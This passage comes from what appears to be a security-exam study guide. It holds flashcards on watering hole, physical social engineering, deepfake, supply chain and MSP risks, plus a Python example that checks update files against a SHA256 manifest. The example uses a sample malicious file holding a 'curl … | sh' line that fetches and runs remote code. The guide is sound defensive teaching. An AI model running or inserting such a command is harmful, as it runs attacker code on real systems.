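        # Visible URL that differs from the real target: credential-harvesting lure
        shown = urlparse(text).hostname if text.startswith(("http://", "https://")) else None
        if shown and registrable(shown) != registrable(host):
            indicators.add("link_text_mismatch")
    return indicators
```

None of these indicators is proof on its own (a legitimate ticketing system sets a different Reply-To, for instance), which is why the function returns the set rather than a verdict; a mail gateway rule would weigh them, and the look-alike check in particular is what the typosquatting card turns on.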

66

Watering hole attack

A watering hole attack compromises a site or service frequently used by the intended victims and waits for them to visit.

Example: Attackers compromise a trusted industry resource because employees of the target organization visit it regularly.

Memory trick: Predator waits where the targets gather.

Trick question tip: If a trusted site that a specific group commonly visits is compromised in order to reach that group, think watering hole.

67

Physical social engineering

Physical social engineering uses deception, distraction, urgency, or impersonation to bypass physical security procedures.

Example: An attacker creates confusion during an emergency and enters a restricted area while staff are distracted.

Memory trick: Trick people to cross the physical boundary.

Trick question tip: Distraction, fake emergency, impersonation, or manipulation used for building access points to physical social engineering.

68

Deepfake-enabled social engineering

Deepfake technology can imitate a person's voice or appearance, making impersonation and urgent fraudulent requests more convincing.

Example: An employee receives a realistic voice message that appears to come from a senior leader requesting a payment.

Memory trick: Familiar voice does not prove identity.

Trick question tip: Realistic generated voice or video used to imitate a trusted person points to deepfake-enabled social engineering.

69

Supply chain attack

A supply chain attack compromises a vendor, supplier, product, service, update process, or other trusted partner to reach the final target indirectly.

Example: An attacker compromises a software provider so customers receive a harmful update through a trusted channel.

Memory trick: Attack the trusted link to reach the target.

Trick question tip: Vendor, supplier, update, contractor, partner, or third-party compromise points to a supply chain attack.

70

Supply chain security

Supply chain security manages third-party risk by assessing vendors, setting contractual security requirements, monitoring access, and verifying the integrity of hardware, software, firmware, and updates.

Example: An organization reviews a supplier's controls and verifies delivered components before deployment.

Memory trick: Protect and verify every trusted link.

Trick question tip: Vendor assessments, contract requirements, integrity checks, and third-party monitoring point to supply chain security.
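Added example (not from the original page) of the "verify the integrity of updates" control from this card: check received files against a published SHA256SUMS-style manifest, detecting a file altered in transit and a file that arrived without being listed. The files and manifest are constructed here, and the manifest is built from the genuine bytes only so the example runs offline. The point that matters in practice, and that the code cannot supply for you, is that the manifest itself must reach you over an authenticated channel (a signature or a pinned out-of-band copy); otherwise an attacker who can alter the update can alter the digests as well.

```python
import hashlib
import hmac

# Constructed stand-ins for the files a vendor ships; names and contents are
# made up for this example and are not from the original page.
GENUINE_FILES = {
    "agent-2.4.1.tar.gz": b"genuine agent build 2.4.1\n",
    "agent-2.4.1.sig":    b"detached signature bytes\n",
}


def build_manifest(files: dict) -> str:
    """SHA256SUMS layout: '<hex digest>  <filename>' per line."""
    return "".join(f"{hashlib.sha256(data).hexdigest()}  {name}\n"
                   for name, data in files.items())


# The manifest the vendor published. Built from the genuine bytes here so the
# example is self-contained; in real use it is fetched and authenticated first.
PUBLISHED_MANIFEST = build_manifest(GENUINE_FILES)

# What actually arrived over the update channel: one file altered in transit
# and one extra file the manifest never mentioned.
RECEIVED_FILES = {
    "agent-2.4.1.tar.gz": b"genuine agent build 2.4.1\n" + b"#injected\n",
    "agent-2.4.1.sig":    b"detached signature bytes\n",
    "helper.sh":          b"curl http://203.0.113.9/x | sh\n",
}


def parse_manifest(text: str) -> dict:
    """Map filename -> expected hex digest from SHA256SUMS-style lines."""
    expected = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        expected[name.strip()] = digest.strip().lower()
    return expected


def verify_received(manifest_text: str, received: dict) -> dict:
    """Classify each received file as ok, tampered or unlisted, and report
    manifest entries that never arrived as missing.

    Digests are compared with compare_digest out of habit; the security
    property rests on the manifest being authenticated, not on the compare.
    """
    expected = parse_manifest(manifest_text)
    result = {"ok": [], "tampered": [], "unlisted": [], "missing": []}
    for name, data in received.items():
        if name not in expected:
            result["unlisted"].append(name)
            continue
        actual = hashlib.sha256(data).hexdigest()
        if hmac.compare_digest(actual, expected[name]):
            result["ok"].append(name)
        else:
            result["tampered"].append(name)
    result["missing"] = sorted(set(expected) - set(received))
    return result


def safe_to_install(report: dict) -> bool:
    """Install only if every listed file arrived intact and nothing extra
    rode along with it."""
    return not (report["tampered"] or report["unlisted"] or report["missing"])


if __name__ == "__main__":
    report = verify_received(PUBLISHED_MANIFEST, RECEIVED_FILES)
    for category, names in report.items():
        print(f"{category}: {', '.join(names) or '-'}")
    print("install:", safe_to_install(report))
```

The unlisted category is easy to forget: a verifier that only checks the files it expects will happily ignore an extra script dropped into the same update bundle, so the decision function refuses on extras as well as on mismatches.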

71

Managed service provider risk

An MSP manages technology for multiple customers, so compromise of the provider can give an attacker indirect access to many organizations at once.

Example: A criminal compromises a provider's remote management system and uses it to reach several customer networks.

Memory trick: One provider compromise can multiply the victims.

Trick question tip: A third party managing networks, cloud services, backups, or remote administration for many customers points to MSP risk.